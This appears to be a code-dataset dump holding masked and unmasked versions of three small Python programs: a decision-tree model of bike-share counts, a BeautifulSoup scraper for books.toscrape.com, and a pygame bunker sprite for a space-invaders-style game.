    print(sqrt(mean_squared_error(test['Counts'], regressor.predict(test[['Start station number', 'Quarter']]))))

    return

if __name__ == "__main__":
    main()
normal
{ "blob_id": "e35dbcdef8779ffabc34b5e5c543e35b29523971", "index": 7989, "step-1": "<mask token>\n\n\ndef make_scatter(df):\n plt.figure(figsize=(8, 6))\n plt.plot(df['Start station number'], df['Counts'], 'o')\n plt.xlabel('Station')\n plt.ylabel('Counts')\n plt.show()\n return\n\n\ndef train_predict_1d(df, test):\n regressor = DecisionTreeRegressor(max_depth=2)\n regressor.fit(np.array([df['Start station number']]).T, df['Counts'])\n xx = np.array([test['Start station number']]).T\n plt.figure(figsize=(8, 6))\n plt.plot(df['Start station number'], df['Counts'], 'o', label='observation'\n )\n plt.plot(xx, regressor.predict(xx), linewidth=4, alpha=0.7, label=\n 'prediction')\n plt.xlabel('Station')\n plt.ylabel('Counts')\n plt.legend()\n print('RMSE')\n print(sqrt(mean_squared_error(test['Counts'], regressor.predict(xx))))\n return\n\n\ndef train_predict_2d(df, test):\n regressor = DecisionTreeRegressor()\n regressor.fit(df[['Start station number', 'Quarter']], df['Counts'])\n nx = 30\n ny = 30\n x_station = np.linspace(30800, 32300, nx)\n y_day = np.linspace(0, 3, ny)\n xx, yy = np.meshgrid(x_station, y_day)\n z_counts = regressor.predict(np.array([xx.flatten(), yy.flatten()]).T)\n zz = np.reshape(z_counts, (nx, ny))\n fig = plt.figure(figsize=(8, 8))\n plt.pcolormesh(x_station, y_day, zz, cmap=plt.cm.YlOrRd)\n plt.colorbar(label='bikes predicted')\n plt.xlim(np.min(x_station), np.max(x_station))\n plt.ylim(np.min(y_day), np.max(y_day))\n plt.xlabel('Start station number')\n plt.ylabel('Quarter')\n print('Mean Absolute Error')\n print(mean_absolute_error(test['Counts'], regressor.predict(test[[\n 'Start station number', 'Quarter']])))\n print('RMSE')\n print(sqrt(mean_squared_error(test['Counts'], regressor.predict(test[[\n 'Start station number', 'Quarter']]))))\n return\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef main():\n df = pandas.read_csv('2016Q1')\n df = df.append(pandas.read_csv('2016Q2'))\n df = df.append(pandas.read_csv('2016Q3'))\n df = df.append(pandas.read_csv('2016Q4'))\n test = pandas.read_csv('2017Q1')\n test = test.append(pandas.read_csv('2017Q2'))\n test = test.append(pandas.read_csv('2017Q3'))\n test = test.append(pandas.read_csv('2017Q4'))\n train_predict_1d(df, test)\n return\n\n\ndef make_scatter(df):\n plt.figure(figsize=(8, 6))\n plt.plot(df['Start station number'], df['Counts'], 'o')\n plt.xlabel('Station')\n plt.ylabel('Counts')\n plt.show()\n return\n\n\ndef train_predict_1d(df, test):\n regressor = DecisionTreeRegressor(max_depth=2)\n regressor.fit(np.array([df['Start station number']]).T, df['Counts'])\n xx = np.array([test['Start station number']]).T\n plt.figure(figsize=(8, 6))\n plt.plot(df['Start station number'], df['Counts'], 'o', label='observation'\n )\n plt.plot(xx, regressor.predict(xx), linewidth=4, alpha=0.7, label=\n 'prediction')\n plt.xlabel('Station')\n plt.ylabel('Counts')\n plt.legend()\n print('RMSE')\n print(sqrt(mean_squared_error(test['Counts'], regressor.predict(xx))))\n return\n\n\ndef train_predict_2d(df, test):\n regressor = DecisionTreeRegressor()\n regressor.fit(df[['Start station number', 'Quarter']], df['Counts'])\n nx = 30\n ny = 30\n x_station = np.linspace(30800, 32300, nx)\n y_day = np.linspace(0, 3, ny)\n xx, yy = np.meshgrid(x_station, y_day)\n z_counts = regressor.predict(np.array([xx.flatten(), yy.flatten()]).T)\n zz = np.reshape(z_counts, (nx, ny))\n fig = plt.figure(figsize=(8, 8))\n plt.pcolormesh(x_station, y_day, zz, cmap=plt.cm.YlOrRd)\n plt.colorbar(label='bikes predicted')\n plt.xlim(np.min(x_station), 
np.max(x_station))\n plt.ylim(np.min(y_day), np.max(y_day))\n plt.xlabel('Start station number')\n plt.ylabel('Quarter')\n print('Mean Absolute Error')\n print(mean_absolute_error(test['Counts'], regressor.predict(test[[\n 'Start station number', 'Quarter']])))\n print('RMSE')\n print(sqrt(mean_squared_error(test['Counts'], regressor.predict(test[[\n 'Start station number', 'Quarter']]))))\n return\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef main():\n df = pandas.read_csv('2016Q1')\n df = df.append(pandas.read_csv('2016Q2'))\n df = df.append(pandas.read_csv('2016Q3'))\n df = df.append(pandas.read_csv('2016Q4'))\n test = pandas.read_csv('2017Q1')\n test = test.append(pandas.read_csv('2017Q2'))\n test = test.append(pandas.read_csv('2017Q3'))\n test = test.append(pandas.read_csv('2017Q4'))\n train_predict_1d(df, test)\n return\n\n\ndef make_scatter(df):\n plt.figure(figsize=(8, 6))\n plt.plot(df['Start station number'], df['Counts'], 'o')\n plt.xlabel('Station')\n plt.ylabel('Counts')\n plt.show()\n return\n\n\ndef train_predict_1d(df, test):\n regressor = DecisionTreeRegressor(max_depth=2)\n regressor.fit(np.array([df['Start station number']]).T, df['Counts'])\n xx = np.array([test['Start station number']]).T\n plt.figure(figsize=(8, 6))\n plt.plot(df['Start station number'], df['Counts'], 'o', label='observation'\n )\n plt.plot(xx, regressor.predict(xx), linewidth=4, alpha=0.7, label=\n 'prediction')\n plt.xlabel('Station')\n plt.ylabel('Counts')\n plt.legend()\n print('RMSE')\n print(sqrt(mean_squared_error(test['Counts'], regressor.predict(xx))))\n return\n\n\ndef train_predict_2d(df, test):\n regressor = DecisionTreeRegressor()\n regressor.fit(df[['Start station number', 'Quarter']], df['Counts'])\n nx = 30\n ny = 30\n x_station = np.linspace(30800, 32300, nx)\n y_day = np.linspace(0, 3, ny)\n xx, yy = np.meshgrid(x_station, y_day)\n z_counts = regressor.predict(np.array([xx.flatten(), yy.flatten()]).T)\n zz = np.reshape(z_counts, (nx, ny))\n fig = plt.figure(figsize=(8, 8))\n plt.pcolormesh(x_station, y_day, zz, cmap=plt.cm.YlOrRd)\n plt.colorbar(label='bikes predicted')\n plt.xlim(np.min(x_station), np.max(x_station))\n plt.ylim(np.min(y_day), np.max(y_day))\n plt.xlabel('Start station number')\n plt.ylabel('Quarter')\n print('Mean Absolute Error')\n print(mean_absolute_error(test['Counts'], regressor.predict(test[[\n 'Start station number', 'Quarter']])))\n print('RMSE')\n print(sqrt(mean_squared_error(test['Counts'], regressor.predict(test[[\n 'Start station number', 'Quarter']]))))\n return\n\n\nif __name__ == '__main__':\n main()\n", "step-4": "import pandas\nfrom matplotlib import pyplot as plt\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import AdaBoostRegressor\nimport numpy as np\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error\nfrom math import sqrt\n\n\ndef main():\n df = pandas.read_csv('2016Q1')\n df = df.append(pandas.read_csv('2016Q2'))\n df = df.append(pandas.read_csv('2016Q3'))\n df = df.append(pandas.read_csv('2016Q4'))\n test = pandas.read_csv('2017Q1')\n test = test.append(pandas.read_csv('2017Q2'))\n test = test.append(pandas.read_csv('2017Q3'))\n test = test.append(pandas.read_csv('2017Q4'))\n train_predict_1d(df, test)\n return\n\n\ndef make_scatter(df):\n plt.figure(figsize=(8, 6))\n plt.plot(df['Start station number'], df['Counts'], 'o')\n plt.xlabel('Station')\n plt.ylabel('Counts')\n plt.show()\n return\n\n\ndef train_predict_1d(df, test):\n regressor = DecisionTreeRegressor(max_depth=2)\n 
regressor.fit(np.array([df['Start station number']]).T, df['Counts'])\n xx = np.array([test['Start station number']]).T\n plt.figure(figsize=(8, 6))\n plt.plot(df['Start station number'], df['Counts'], 'o', label='observation'\n )\n plt.plot(xx, regressor.predict(xx), linewidth=4, alpha=0.7, label=\n 'prediction')\n plt.xlabel('Station')\n plt.ylabel('Counts')\n plt.legend()\n print('RMSE')\n print(sqrt(mean_squared_error(test['Counts'], regressor.predict(xx))))\n return\n\n\ndef train_predict_2d(df, test):\n regressor = DecisionTreeRegressor()\n regressor.fit(df[['Start station number', 'Quarter']], df['Counts'])\n nx = 30\n ny = 30\n x_station = np.linspace(30800, 32300, nx)\n y_day = np.linspace(0, 3, ny)\n xx, yy = np.meshgrid(x_station, y_day)\n z_counts = regressor.predict(np.array([xx.flatten(), yy.flatten()]).T)\n zz = np.reshape(z_counts, (nx, ny))\n fig = plt.figure(figsize=(8, 8))\n plt.pcolormesh(x_station, y_day, zz, cmap=plt.cm.YlOrRd)\n plt.colorbar(label='bikes predicted')\n plt.xlim(np.min(x_station), np.max(x_station))\n plt.ylim(np.min(y_day), np.max(y_day))\n plt.xlabel('Start station number')\n plt.ylabel('Quarter')\n print('Mean Absolute Error')\n print(mean_absolute_error(test['Counts'], regressor.predict(test[[\n 'Start station number', 'Quarter']])))\n print('RMSE')\n print(sqrt(mean_squared_error(test['Counts'], regressor.predict(test[[\n 'Start station number', 'Quarter']]))))\n return\n\n\nif __name__ == '__main__':\n main()\n", "step-5": "#!/usr/bin/env python3\n\nimport pandas\nfrom matplotlib import pyplot as plt\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import AdaBoostRegressor\nimport numpy as np\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error\nfrom math import sqrt\n\ndef main():\n df = pandas.read_csv(\"2016Q1\")\n df = df.append(pandas.read_csv(\"2016Q2\"))\n df = df.append(pandas.read_csv(\"2016Q3\"))\n df = df.append(pandas.read_csv(\"2016Q4\"))\n\n test = pandas.read_csv(\"2017Q1\")\n test = test.append(pandas.read_csv(\"2017Q2\"))\n test = test.append(pandas.read_csv(\"2017Q3\"))\n test = test.append(pandas.read_csv(\"2017Q4\"))\n #make_scatter(df)\n train_predict_1d(df, test)\n #train_predict_2d(df, test)\n return\n\ndef make_scatter(df):\n plt.figure(figsize=(8,6))\n plt.plot(df['Start station number'], df['Counts'], 'o')\n plt.xlabel('Station')\n plt.ylabel('Counts')\n plt.show()\n return\n\ndef train_predict_1d(df, test):\n regressor = DecisionTreeRegressor(max_depth=2)\n regressor.fit(np.array([df['Start station number']]).T, df['Counts'])\n \n xx = np.array([test['Start station number']]).T\n plt.figure(figsize=(8,6))\n plt.plot(df['Start station number'], df['Counts'], 'o', label='observation')\n plt.plot(xx, regressor.predict(xx), linewidth=4, alpha=.7, label='prediction')\n plt.xlabel('Station')\n plt.ylabel('Counts')\n plt.legend()\n #plt.show()\n\n print(\"RMSE\")\n print(sqrt(mean_squared_error(test['Counts'], regressor.predict(xx))))\n return\n\ndef train_predict_2d(df, test):\n #regressor = AdaBoostRegressor(DecisionTreeRegressor(max_depth=10), n_estimators=50, loss=\"square\")\n regressor = DecisionTreeRegressor()\n regressor.fit(df[['Start station number', 'Quarter']], df['Counts'])\n\n nx = 30\n ny = 30\n \n x_station = np.linspace(30800,32300, nx) \n y_day = np.linspace(0, 3, ny)\n xx, yy = np.meshgrid(x_station, y_day)\n\n z_counts = regressor.predict(np.array([xx.flatten(), yy.flatten()]).T)\n zz = np.reshape(z_counts, (nx, ny))\n\n fig = plt.figure(figsize=(8, 8))\n 
plt.pcolormesh(x_station, y_day, zz, cmap=plt.cm.YlOrRd)\n plt.colorbar(label='bikes predicted') \n #plt.scatter(test['Start station number'], test['Counts'], s=test['Counts']/25.0, c='g')\n plt.xlim(np.min(x_station), np.max(x_station))\n plt.ylim(np.min(y_day), np.max(y_day))\n plt.xlabel('Start station number')\n plt.ylabel('Quarter')\n #plt.show()\n #fig.savefig(\"2d_prediction_quarter\")\n\n print(\"Mean Absolute Error\")\n print(mean_absolute_error(test['Counts'], regressor.predict(test[['Start station number', 'Quarter']])))\n print(\"RMSE\")\n print(sqrt(mean_squared_error(test['Counts'], regressor.predict(test[['Start station number', 'Quarter']]))))\n\n return\n\nif __name__ == \"__main__\":\n main()\n", "step-ids": [ 3, 4, 5, 6, 7 ] }
[ 3, 4, 5, 6, 7 ]
import requests
from bs4 import BeautifulSoup

class Book:

    def __init__(self, url):
        self.url = url
        self.title = ""
        self.category = ""
        self.upc = ""
        self.price_including_tax = ""
        self.price_excluding_tax = ""
        self.number_available = ""
        self.description = ""
        self.review_rating = ""
        self.image_url = ""
        self.tax = ""

    def scrap(self):
        book = requests.get(self.url)
        soup = BeautifulSoup(book.content, "html.parser")
        self.__fill_title(soup)
        self.__fill_category(soup)
        self.__fill_upc(soup)
        self.__fill_price_including_tax(soup)
        self.__fill_price_excluding_tax(soup)
        self.__fill_number_available(soup)
        self.__fill_description(soup)
        self.__fill_review_rating(soup)
        self.__fill_image_url(soup)
        self.__fill_tax(soup)

    def __fill_title(self, soup):
        title = soup.find("div", {"class": "col-sm-6 product_main"}).find("h1")
        self.title = title.text

    def __fill_category(self, soup):
        # The category is the third entry of the breadcrumb list.
        category = soup.findAll("li")
        self.category = category[2].text.replace("\n", "")

    def __fill_upc(self, soup):
        tds = soup.findAll("td")
        self.upc = tds[0].text

    def __fill_price_including_tax(self, soup):
        tds = soup.findAll("td")
        self.price_including_tax = tds[3].text

    def __fill_price_excluding_tax(self, soup):
        tds = soup.findAll("td")
        self.price_excluding_tax = tds[2].text

    def __fill_number_available(self, soup):
        tds = soup.findAll("td")
        self.number_available = tds[5].text

    def __fill_description(self, soup):
        div = soup.find("div", class_="sub-header")
        p = div.find_next_sibling()
        self.description = p.text

    def __fill_review_rating(self, soup):
        p = soup.find("div", {"class": "col-sm-6 product_main"}).find(
            "p", class_="star-rating"
        )
        # p["class"] is a list such as ['star-rating', 'Three']; the second
        # entry is the rating word. Store it on the instance (the original
        # returned it instead, so __str__ always reported an empty rating)
        # rather than slicing the stringified list and passing it to eval.
        self.review_rating = p["class"][1]

    def __fill_image_url(self, soup):
        image = soup.find("div", {"class": "item active"}).find("img")
        image_url = image["src"]
        self.image_url = image_url.replace("../../", "http://books.toscrape.com/")

    def __fill_tax(self, soup):
        tds = soup.findAll("td")
        self.tax = tds[4].text

    def __str__(self):
        output = f"url : {self.url} \ntitle : {self.title} \ncategory : {self.category} \nupc : {self.upc} \nprice_including_tax : {self.price_including_tax} \nprice_excluding_tax : {self.price_excluding_tax} \nnumber_available : {self.number_available} \ndescription : {self.description} \nreview_rating : {self.review_rating} \nimage_url : {self.image_url} \ntax : {self.tax} "
        return output


# book = Book("http://books.toscrape.com/catalogue/a-light-in-the-attic_1000/index.html")
# book.scrap()
# print(book)
normal
{ "blob_id": "3dc83168264fbb4f9b0ab2980b845dffdc4417bb", "index": 7588, "step-1": "<mask token>\n\n\nclass Book:\n\n def __init__(self, url):\n self.url = url\n self.title = ''\n self.category = ''\n self.upc = ''\n self.price_including_tax = ''\n self.price_excluding_tax = ''\n self.number_available = ''\n self.description = ''\n self.review_rating = ''\n self.image_url = ''\n self.tax = ''\n\n def scrap(self):\n book = requests.get(self.url)\n soup = BeautifulSoup(book.content, 'html.parser')\n self.__fill_title(soup)\n self.__fill_category(soup)\n self.__fill_upc(soup)\n self.__fill_price_including_tax(soup)\n self.__fill_price_excluding_tax(soup)\n self.__fill_number_available(soup)\n self.__fill_description(soup)\n self.__fill_review_rating(soup)\n self.__fill_image_url(soup)\n self.__fill_tax(soup)\n <mask token>\n\n def __fill_category(self, soup):\n category = soup.findAll('li')\n category2 = category[2].text\n self.category = category2.replace('\\n', '')\n\n def __fill_upc(self, soup):\n tds = soup.findAll('td')\n self.upc = tds[0].text\n\n def __fill_price_including_tax(self, soup):\n tds = soup.findAll('td')\n self.price_including_tax = tds[3].text\n <mask token>\n <mask token>\n\n def __fill_description(self, soup):\n div = soup.find('div', class_='sub-header')\n p = div.find_next_sibling()\n self.description = p.text\n\n def __fill_review_rating(self, soup):\n p = soup.find('div', {'class': 'col-sm-6 product_main'}).find('p',\n class_='star-rating')\n rating = str(p['class'])\n star = rating[15:-1]\n star_rating = eval(star)\n return star_rating\n\n def __fill_image_url(self, soup):\n image = soup.find('div', {'class': 'item active'}).find('img')\n image_url = image['src']\n image_clean_url = image_url.replace('../../',\n 'http://books.toscrape.com/')\n self.image_url = image_clean_url\n\n def __fill_tax(self, soup):\n tds = soup.findAll('td')\n self.tax = tds[4].text\n\n def __str__(self):\n output = f\"\"\"url : {self.url} \ntitle : {self.title} \ncategory : {self.category} \nupc : {self.upc} \nprice_including_tax : {self.price_including_tax} \nprice_excluding_tax : {self.price_excluding_tax} \nnumber_available : {self.number_available} \ndescription : {self.description} \nreview_rating : {self.review_rating} \nimage_url : {self.image_url} \ntax : {self.tax} \"\"\"\n return output\n", "step-2": "<mask token>\n\n\nclass Book:\n\n def __init__(self, url):\n self.url = url\n self.title = ''\n self.category = ''\n self.upc = ''\n self.price_including_tax = ''\n self.price_excluding_tax = ''\n self.number_available = ''\n self.description = ''\n self.review_rating = ''\n self.image_url = ''\n self.tax = ''\n\n def scrap(self):\n book = requests.get(self.url)\n soup = BeautifulSoup(book.content, 'html.parser')\n self.__fill_title(soup)\n self.__fill_category(soup)\n self.__fill_upc(soup)\n self.__fill_price_including_tax(soup)\n self.__fill_price_excluding_tax(soup)\n self.__fill_number_available(soup)\n self.__fill_description(soup)\n self.__fill_review_rating(soup)\n self.__fill_image_url(soup)\n self.__fill_tax(soup)\n <mask token>\n\n def __fill_category(self, soup):\n category = soup.findAll('li')\n category2 = category[2].text\n self.category = category2.replace('\\n', '')\n\n def __fill_upc(self, soup):\n tds = soup.findAll('td')\n self.upc = tds[0].text\n\n def __fill_price_including_tax(self, soup):\n tds = soup.findAll('td')\n self.price_including_tax = tds[3].text\n <mask token>\n\n def __fill_number_available(self, soup):\n tds = soup.findAll('td')\n 
self.number_available = tds[5].text\n\n def __fill_description(self, soup):\n div = soup.find('div', class_='sub-header')\n p = div.find_next_sibling()\n self.description = p.text\n\n def __fill_review_rating(self, soup):\n p = soup.find('div', {'class': 'col-sm-6 product_main'}).find('p',\n class_='star-rating')\n rating = str(p['class'])\n star = rating[15:-1]\n star_rating = eval(star)\n return star_rating\n\n def __fill_image_url(self, soup):\n image = soup.find('div', {'class': 'item active'}).find('img')\n image_url = image['src']\n image_clean_url = image_url.replace('../../',\n 'http://books.toscrape.com/')\n self.image_url = image_clean_url\n\n def __fill_tax(self, soup):\n tds = soup.findAll('td')\n self.tax = tds[4].text\n\n def __str__(self):\n output = f\"\"\"url : {self.url} \ntitle : {self.title} \ncategory : {self.category} \nupc : {self.upc} \nprice_including_tax : {self.price_including_tax} \nprice_excluding_tax : {self.price_excluding_tax} \nnumber_available : {self.number_available} \ndescription : {self.description} \nreview_rating : {self.review_rating} \nimage_url : {self.image_url} \ntax : {self.tax} \"\"\"\n return output\n", "step-3": "<mask token>\n\n\nclass Book:\n\n def __init__(self, url):\n self.url = url\n self.title = ''\n self.category = ''\n self.upc = ''\n self.price_including_tax = ''\n self.price_excluding_tax = ''\n self.number_available = ''\n self.description = ''\n self.review_rating = ''\n self.image_url = ''\n self.tax = ''\n\n def scrap(self):\n book = requests.get(self.url)\n soup = BeautifulSoup(book.content, 'html.parser')\n self.__fill_title(soup)\n self.__fill_category(soup)\n self.__fill_upc(soup)\n self.__fill_price_including_tax(soup)\n self.__fill_price_excluding_tax(soup)\n self.__fill_number_available(soup)\n self.__fill_description(soup)\n self.__fill_review_rating(soup)\n self.__fill_image_url(soup)\n self.__fill_tax(soup)\n <mask token>\n\n def __fill_category(self, soup):\n category = soup.findAll('li')\n category2 = category[2].text\n self.category = category2.replace('\\n', '')\n\n def __fill_upc(self, soup):\n tds = soup.findAll('td')\n self.upc = tds[0].text\n\n def __fill_price_including_tax(self, soup):\n tds = soup.findAll('td')\n self.price_including_tax = tds[3].text\n\n def __fill_price_excluding_tax(self, soup):\n tds = soup.findAll('td')\n self.price_excluding_tax = tds[2].text\n\n def __fill_number_available(self, soup):\n tds = soup.findAll('td')\n self.number_available = tds[5].text\n\n def __fill_description(self, soup):\n div = soup.find('div', class_='sub-header')\n p = div.find_next_sibling()\n self.description = p.text\n\n def __fill_review_rating(self, soup):\n p = soup.find('div', {'class': 'col-sm-6 product_main'}).find('p',\n class_='star-rating')\n rating = str(p['class'])\n star = rating[15:-1]\n star_rating = eval(star)\n return star_rating\n\n def __fill_image_url(self, soup):\n image = soup.find('div', {'class': 'item active'}).find('img')\n image_url = image['src']\n image_clean_url = image_url.replace('../../',\n 'http://books.toscrape.com/')\n self.image_url = image_clean_url\n\n def __fill_tax(self, soup):\n tds = soup.findAll('td')\n self.tax = tds[4].text\n\n def __str__(self):\n output = f\"\"\"url : {self.url} \ntitle : {self.title} \ncategory : {self.category} \nupc : {self.upc} \nprice_including_tax : {self.price_including_tax} \nprice_excluding_tax : {self.price_excluding_tax} \nnumber_available : {self.number_available} \ndescription : {self.description} \nreview_rating : 
{self.review_rating} \nimage_url : {self.image_url} \ntax : {self.tax} \"\"\"\n return output\n", "step-4": "import requests\nfrom bs4 import BeautifulSoup\n\n\nclass Book:\n\n def __init__(self, url):\n self.url = url\n self.title = ''\n self.category = ''\n self.upc = ''\n self.price_including_tax = ''\n self.price_excluding_tax = ''\n self.number_available = ''\n self.description = ''\n self.review_rating = ''\n self.image_url = ''\n self.tax = ''\n\n def scrap(self):\n book = requests.get(self.url)\n soup = BeautifulSoup(book.content, 'html.parser')\n self.__fill_title(soup)\n self.__fill_category(soup)\n self.__fill_upc(soup)\n self.__fill_price_including_tax(soup)\n self.__fill_price_excluding_tax(soup)\n self.__fill_number_available(soup)\n self.__fill_description(soup)\n self.__fill_review_rating(soup)\n self.__fill_image_url(soup)\n self.__fill_tax(soup)\n\n def __fill_title(self, soup):\n title = soup.find('div', {'class': 'col-sm-6 product_main'}).find('h1')\n self.title = title.text\n\n def __fill_category(self, soup):\n category = soup.findAll('li')\n category2 = category[2].text\n self.category = category2.replace('\\n', '')\n\n def __fill_upc(self, soup):\n tds = soup.findAll('td')\n self.upc = tds[0].text\n\n def __fill_price_including_tax(self, soup):\n tds = soup.findAll('td')\n self.price_including_tax = tds[3].text\n\n def __fill_price_excluding_tax(self, soup):\n tds = soup.findAll('td')\n self.price_excluding_tax = tds[2].text\n\n def __fill_number_available(self, soup):\n tds = soup.findAll('td')\n self.number_available = tds[5].text\n\n def __fill_description(self, soup):\n div = soup.find('div', class_='sub-header')\n p = div.find_next_sibling()\n self.description = p.text\n\n def __fill_review_rating(self, soup):\n p = soup.find('div', {'class': 'col-sm-6 product_main'}).find('p',\n class_='star-rating')\n rating = str(p['class'])\n star = rating[15:-1]\n star_rating = eval(star)\n return star_rating\n\n def __fill_image_url(self, soup):\n image = soup.find('div', {'class': 'item active'}).find('img')\n image_url = image['src']\n image_clean_url = image_url.replace('../../',\n 'http://books.toscrape.com/')\n self.image_url = image_clean_url\n\n def __fill_tax(self, soup):\n tds = soup.findAll('td')\n self.tax = tds[4].text\n\n def __str__(self):\n output = f\"\"\"url : {self.url} \ntitle : {self.title} \ncategory : {self.category} \nupc : {self.upc} \nprice_including_tax : {self.price_including_tax} \nprice_excluding_tax : {self.price_excluding_tax} \nnumber_available : {self.number_available} \ndescription : {self.description} \nreview_rating : {self.review_rating} \nimage_url : {self.image_url} \ntax : {self.tax} \"\"\"\n return output\n", "step-5": "import requests\nfrom bs4 import BeautifulSoup\n\nclass Book:\n\n def __init__(self, url):\n self.url = url\n self.title = \"\"\n self.category = \"\"\n self.upc=\"\"\n self.price_including_tax=\"\"\n self.price_excluding_tax=\"\"\n self.number_available=\"\"\n self.description=\"\"\n self.review_rating=\"\"\n self.image_url=\"\"\n self.tax=\"\"\n \n def scrap(self): \n book = requests.get(self.url) \n soup = BeautifulSoup(book.content, \"html.parser\")\n self.__fill_title(soup) \n self.__fill_category(soup)\n self.__fill_upc(soup)\n self.__fill_price_including_tax(soup)\n self.__fill_price_excluding_tax(soup)\n self.__fill_number_available(soup)\n self.__fill_description(soup)\n self.__fill_review_rating(soup)\n self.__fill_image_url(soup)\n self.__fill_tax(soup)\n \n def __fill_title(self,soup): \n title = 
soup.find(\"div\", {\"class\": \"col-sm-6 product_main\"}).find(\"h1\")\n self.title= title.text\n # return self.title\n \n \n def __fill_category(self,soup):\n category = soup.findAll(\"li\")\n category2 = category[2].text\n self.category = category2.replace(\"\\n\", \"\")\n # return self.category\n\n def __fill_upc(self,soup):\n tds = soup.findAll(\"td\")\n self.upc = tds[0].text\n\n def __fill_price_including_tax(self,soup):\n tds = soup.findAll(\"td\")\n self.price_including_tax = tds[3].text\n\n def __fill_price_excluding_tax(self,soup):\n tds = soup.findAll(\"td\")\n self.price_excluding_tax = tds[2].text\n\n def __fill_number_available(self,soup):\n tds = soup.findAll(\"td\")\n self.number_available = tds[5].text\n\n def __fill_description(self,soup):\n div = soup.find(\"div\", class_=\"sub-header\")\n p = div.find_next_sibling()\n self.description = p.text\n # return self.description\n\n def __fill_review_rating(self,soup):\n p = soup.find(\"div\", {\"class\": \"col-sm-6 product_main\"}).find(\n \"p\", class_=\"star-rating\"\n )\n rating = str(p[\"class\"])\n star = rating[15:-1]\n star_rating = eval(star)\n return star_rating\n \n\n def __fill_image_url(self,soup):\n image = soup.find(\"div\", {\"class\": \"item active\"}).find(\"img\")\n image_url = image[\"src\"]\n image_clean_url = image_url.replace(\"../../\", \"http://books.toscrape.com/\")\n self.image_url = image_clean_url\n\n def __fill_tax(self,soup):\n tds = soup.findAll(\"td\")\n self.tax = tds[4].text\n\n def __str__(self):\n output = f\"url : {self.url} \\ntitle : {self.title} \\ncategory : {self.category} \\nupc : {self.upc} \\nprice_including_tax : {self.price_including_tax} \\nprice_excluding_tax : {self.price_excluding_tax} \\nnumber_available : {self.number_available} \\ndescription : {self.description} \\nreview_rating : {self.review_rating} \\nimage_url : {self.image_url} \\ntax : {self.tax} \"\n return output\n \n \n\n \n# book = Book(\"http://books.toscrape.com/catalogue/a-light-in-the-attic_1000/index.html\")\n# book.scrap(\"http://books.toscrape.com/catalogue/a-light-in-the-attic_1000/index.html\")\n# print(book)\n", "step-ids": [ 11, 12, 13, 15, 16 ] }
[ 11, 12, 13, 15, 16 ]
import pygame
from pygame.sprite import Sprite
import spritesheet

class Bunker(Sprite):

    def __init__(self, ai_settings, bunker_x, bunker_y, screen, images):
        """Initialize the bunker and set its starting position"""
        super(Bunker, self).__init__()
        self.screen = screen
        self.images = images

        self.image = self.images[18]

        self.rect = self.image.get_rect()
        self.screen_rect = screen.get_rect()

        # Place the bunker at the coordinates supplied by the caller
        self.rect.centerx = bunker_x
        self.rect.bottom = bunker_y

        self.bunker_health = 5

    def update(self):
        """Remove the bunker once its health is exhausted"""
        if self.bunker_health == 0:
            self.kill()

    def blitme(self):
        """Draw the bunker at its current location"""
        self.screen.blit(self.image, self.rect)
normal
{ "blob_id": "d088aadc4d88267b908c4f6de2928c812ef36739", "index": 1603, "step-1": "<mask token>\n\n\nclass Bunker(Sprite):\n <mask token>\n <mask token>\n\n def blitme(self):\n \"\"\"Draw the ship at its current location\"\"\"\n self.screen.blit(self.image, self.rect)\n", "step-2": "<mask token>\n\n\nclass Bunker(Sprite):\n\n def __init__(self, ai_settings, bunker_x, bunker_y, screen, images):\n \"\"\"Initialize the ship and set its starting position\"\"\"\n super(Bunker, self).__init__()\n self.screen = screen\n self.images = images\n self.image = self.images[18]\n self.rect = self.image.get_rect()\n self.screen_rect = screen.get_rect()\n self.rect.centerx = bunker_x\n self.rect.bottom = bunker_y\n self.bunker_health = 5\n <mask token>\n\n def blitme(self):\n \"\"\"Draw the ship at its current location\"\"\"\n self.screen.blit(self.image, self.rect)\n", "step-3": "<mask token>\n\n\nclass Bunker(Sprite):\n\n def __init__(self, ai_settings, bunker_x, bunker_y, screen, images):\n \"\"\"Initialize the ship and set its starting position\"\"\"\n super(Bunker, self).__init__()\n self.screen = screen\n self.images = images\n self.image = self.images[18]\n self.rect = self.image.get_rect()\n self.screen_rect = screen.get_rect()\n self.rect.centerx = bunker_x\n self.rect.bottom = bunker_y\n self.bunker_health = 5\n\n def update(self):\n \"\"\"Track the HP of the bunker\"\"\"\n if self.bunker_health == 0:\n self.kill()\n\n def blitme(self):\n \"\"\"Draw the ship at its current location\"\"\"\n self.screen.blit(self.image, self.rect)\n", "step-4": "import pygame\nfrom pygame.sprite import Sprite\nimport spritesheet\n\n\nclass Bunker(Sprite):\n\n def __init__(self, ai_settings, bunker_x, bunker_y, screen, images):\n \"\"\"Initialize the ship and set its starting position\"\"\"\n super(Bunker, self).__init__()\n self.screen = screen\n self.images = images\n self.image = self.images[18]\n self.rect = self.image.get_rect()\n self.screen_rect = screen.get_rect()\n self.rect.centerx = bunker_x\n self.rect.bottom = bunker_y\n self.bunker_health = 5\n\n def update(self):\n \"\"\"Track the HP of the bunker\"\"\"\n if self.bunker_health == 0:\n self.kill()\n\n def blitme(self):\n \"\"\"Draw the ship at its current location\"\"\"\n self.screen.blit(self.image, self.rect)\n", "step-5": "import pygame\nfrom pygame.sprite import Sprite\nimport spritesheet\n\nclass Bunker(Sprite):\n\n def __init__(self, ai_settings, bunker_x, bunker_y, screen, images):\n \"\"\"Initialize the ship and set its starting position\"\"\"\n super(Bunker, self).__init__()\n self.screen = screen\n self.images = images\n\n self.image = self.images[18]\n\n self.rect = self.image.get_rect()\n self.screen_rect = screen.get_rect()\n\n # Start each new bunker at the bottom of the screen\n self.rect.centerx = bunker_x\n self.rect.bottom = bunker_y\n\n # Store a decimal value for the ship's center.\n #self.center = float(self.rect.centerx)\n\n self.bunker_health = 5\n\n def update(self):\n \"\"\"Track the HP of the bunker\"\"\"\n if self.bunker_health == 0:\n self.kill()\n\n def blitme(self):\n \"\"\"Draw the ship at its current location\"\"\"\n self.screen.blit(self.image, self.rect)\n\n\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
